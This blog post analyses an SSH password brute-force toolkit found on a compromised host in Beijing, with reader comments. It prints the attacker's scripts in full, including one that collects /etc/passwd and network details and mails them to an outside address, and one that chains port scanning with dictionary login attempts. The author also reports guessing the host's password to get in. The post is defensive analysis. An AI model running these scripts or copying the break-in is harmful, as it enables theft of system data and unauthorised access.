analysing an ssh password bruteforce attack

Having setup my ssh honeypot, I had my first guest. I thought it might be a victim, so I tried to see whether it has a weak password. It turned out to be really weak. I got it on my second guess. It’s a x86 machine running RHEL5 and has an public IP address in Beijing. A quick glance at the running processes showed no obvious malicious processes. The bash history showed the most recent command was go.sh.

   68  cd /root/
   69  ls
   70  cd lamp-auto
   71  ls
   72  sh lamp-auto.sh
   73  cd
   74  cd /root/gosh
   75  ./go.sh 91

I don’t know why the hacker didn’t clear the history, but I’m certain that the hacker was the most recent logined user before me. The lastlog showed the previous login was from SC Aries Networks Group SRL (Romania). I believe this was from the hacker. It’s unlikely he created a fake lastlog. I tried to access that address but it was offline.

OK, let’s see that’s in /root/gosh.

[root@foo gosh]$ ls -al
total 9500
drwx--x--x   2 root root    4096 Jan 11 14:09 .
drwxrwxr-x. 10 root root    4096 Jan 11 21:50 ..
-rwx--x--x   1 root root 3346659 Jul 23  2006 1
-rwx--x--x   1 root root   54703 Apr 20  2008 2
-rwx--x--x   1 root root   28956 Apr 21  2008 3
-rwx--x--x   1 root root   54703 Apr 20  2008 4
-rwx--x--x   1 root root   26857 Aug 23  2005 5
-rwx--x--x   1 root root    1227 Jul 12  2011 a
-rw-r--r--   1 root root 2830095 Jan 11 16:40 bios.txt
-rwx--x--x   1 root root   22354 Dec  2  2004 common
-rwx--x--x   1 root root     265 Nov 25  2004 gen-pass.sh
-rwx--x--x   1 root root     120 Jul 30  2011 go.sh
-rwx--x--x   1 root root 1972243 Jan 11 16:40 mfu.txt
-rwx--x--x   1 root root     806 Jun 24  2012 pass_file
-rwx--x--x   1 root root   21407 Jul 22  2004 pscan2
-rwx--x--x   1 root root    5908 Jul 12  2011 scam
-rwx--x--x   1 root root     197 Aug 23  2005 secure
-rwx--x--x   1 root root  453972 Jul 13  2004 ss
-rwx--x--x   1 root root  842736 Nov 24  2004 ssh-scan
-rwxr-xr-x   1 root root   10974 Jan 11 16:59 vuln.txt

[root@foo gosh]$ file *
1:           C++ source, ISO-8859 text, with CRLF line terminators
2:           C source, ASCII text
3:           C++ source, ASCII text, with CRLF line terminators
4:           C source, ASCII text
5:           ASCII text
a:           ISO-8859 text
bios.txt:    ASCII text
common:      C++ source, ASCII text
gen-pass.sh: Bourne-Again shell script, ASCII text executable
go.sh:       ASCII text
mfu.txt:     ASCII text
pass_file:   ASCII text
pscan2:      ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
scam:        Bourne-Again shell script, ASCII text executable
secure:      Bourne-Again shell script, ASCII text executable
ss:          ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped
ssh-scan:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped
vuln.txt:    ASCII text

The file 1 to 5 and pass_file are username and password pairs. Those are password dictionaries, no surprise, except there are two interesting long passwords, 7hur@y@t3am$#@!(*( and JFKGHDj3587561346tyhsdfgDFH75q4yeatHADF. Google gives a few hits, but no interesting finding. bios.txt is a list of 205763 IP addresses, including mine. No wonder I’m scanned. go.sh is the one in the bash history. Here’s the script:

perl pscan3
./ss 22 -a $1 -i eth0 -s 10
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan 300
rm -f bios.txt
rm -rf pscan3

There is no file named pscan3, so I don’t know what the first line means. pscan2 is an ELF32 executable. The help message is:

Usage: ./pscan2 <b-block> <port> [c-block]

Other strings from the executable are

%s.pscan.%s
%s.%s.pscan.%s
Invalid b-range.
# scanning:
%s.%d.* (total: %d) (%.1f%% done)
Unable to allocate socket.
Unable to set O_NONBLOCK
%s.%d.%d
Invalid IP.
# pscan completed in %u seconds. (found %d ips)
Y@%s
Error: %s

So it’s a port scanner. Nothing fun. Let’s move to ss. The help message is:

usage: ./ss <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>]
speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)

The hacker’s command was ./ss 22 -a 91 -i eth0 -s 10, so he’s a impatient person. From the strings in the executable, it looks like another port scanner. It uses libpcap to get the reply. The pcap filter (found in the strings dump) is (tcp[tcpflags]=0x12) and (src port %d) and (dst port %d), which selects ACK|SYN packets. Googling it’s SHA1 b45ae5d8d3069ee7f880dd461c931fa711b6ad3d gives me a virustotal report. Detection ratio is 30/46, so it’s quite well known.

OK, the last ELF file, ssh-scan. There isn’t any useful help message this time. From the strings, it looks like a ssh scanner. This is my guess: it reads IP addresses in mfu.txt, user:password pairs in pass_file, and output login results in vuln.txt. All file names are hard coded. I tried a few hosts in vuln.txt, some can login. ssh-scan’s SHA1 4f64a5b07b0c128771ea21bf4aa15610fc6b071c also gets hit in virustotal, with 30/42 detection ratio.

The shell script scam is used to mail the scan result to the hacker.

#!/bin/bash

echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" DaNioN@bk.ru
rm -rf info2
clear

echo "####################################################################"
echo "#                       ______                                  "
echo "#                            .-.      .-.                               "
echo "#                           /            \                              "
echo "#                          |     zRR      |                             "
echo "#                          |,  .-.  .-.  ,|                             "
echo "#                          | )(z_/  \z_)( |                             "
echo "#                          |/     /\     \|                             "
echo "#                  _       (_     ^^     _)                             "
echo "#          _\ ____) \_______\__|IIIIII|__/_________________________     "
echo "#         (_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\    "
echo "#           /     )_/        \          /                               "
echo "#                             \ ______ /                                      "
echo "#                         SCANER PRIVAT                             "
echo "#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               "
echo "#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              "
echo "####################################################################"

if [ -f a ]; then
cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
./a $1.11
...
./a $1.255
killall -9 a
else
echo # Ciudat ..Nu Ai Urmat Instructiunile  #
echo # trebui dat mv assh a sau mv scan a   #
echo # orice ai avea tu ... dohh ..         #
killall -9 a
killall -9 pscan2
fi

I can’t see any trace of this script been executed in this host. Google translate suggests it’s Romanian, but the hacker might not be the script author. Nevertheless, the language and the IP address match! The hacker’s email is DaNioN@bk.ru, which has only one Google hit. The script ./a prepares the input for ssh-scan and launches ssh-scan.

#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi


echo -e "33[1;31m?33[1;32m Created bY zRR 33[1;31m?33[0m"
echo "INCERC SA DAU VIATZA CIBERNETICI"


./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# SA VEDEM CE PULA MEA FACEM"
echo "#          _\ ____) \_______  "
echo "#         (_)[_bY_]{}<zRR> "
echo "#         /     )_/         "
echo "#.......si DE root  ....... "
echo "                            "
echo -e "Checking33[1;34m user file33[0m pass 1"
cp 1 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;31m root file33[0m pass 2"
cp 2 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;34m user file33[0m pass 3"
cp 3 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;34m user file33[0m pass 4"
cp 4 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;31m root file33[0m pass 5"
cp 5 pass_file
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo -e "33[1;31m?33[1;32mFuck .. continuam .. 33[1;31m?33[0m"

It even has terminal color. That’s quite uncommon for a background scanning tool. The hacker can’t sit there and watch the scanning, so what’s the purpose?

To conclude, this is a simple SSH password scanner. It’s simple in the sense it doesn’t propagate itself. The hacker has to manually install and launch it in a newly acquired host.

Advertisements

7 Responses to “analysing an ssh password bruteforce attack”

  1. Iustin Says:

    FYI, the language in the comments is indeed Romanian (with typos!), but the comments are (partially) guidance/help, almost like it was designed by someone and run by other people (less skilled). Maybe this is why it has nice output, as it was custom made (and the hacker wanted to look nice to the client)?

    • wuyongzheng Says:

      Hi Iustin,
      So this guy seems like a script kiddie. Given that the script is not publicly available (at least I can’t find any), there must be some Romanian underground community developing/distributing the tools.

      • Bogdan Bodoo Says:

        it is a script kiddie …many so called Teams modify this to look cool :) … you can find this guys on UnderNet irc server .

        MaLaSorTe is ~Cayte@119.161.132.197 * Keely
        MaLaSorTe using *.undernet.org The Undernet Underworld
        MaLaSorTe has been idle 2hrs 15mins 57secs, signed on Fri Jan 31 00:54:07
        MaLaSorTe End of /WHOIS list.

        this is just one of the SSH password scaner …..

  2. ali Says:

    fuck you is now work anything teach me lol i want to teach how scanner videos

  3. Matt Says:

    Hey man, so glad to have found this! Just hit by the same guy, same “gosh” file. Got some other interesting stuff he left behind if you’re interested

    • wuyongzheng Says:

      Thanks for sharing. Probably a different guy with the same tool. If you think there is some interesting/helpful, you can post here.

  4. Raymond Chandler III Says:

    I just got hit with this same toolchain. Attackers entered through open ssh to postgres with defaults still enabled (including password). I know. I know. Anywho, they installed a counterstrike 1.6 server.

    Kids these days.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: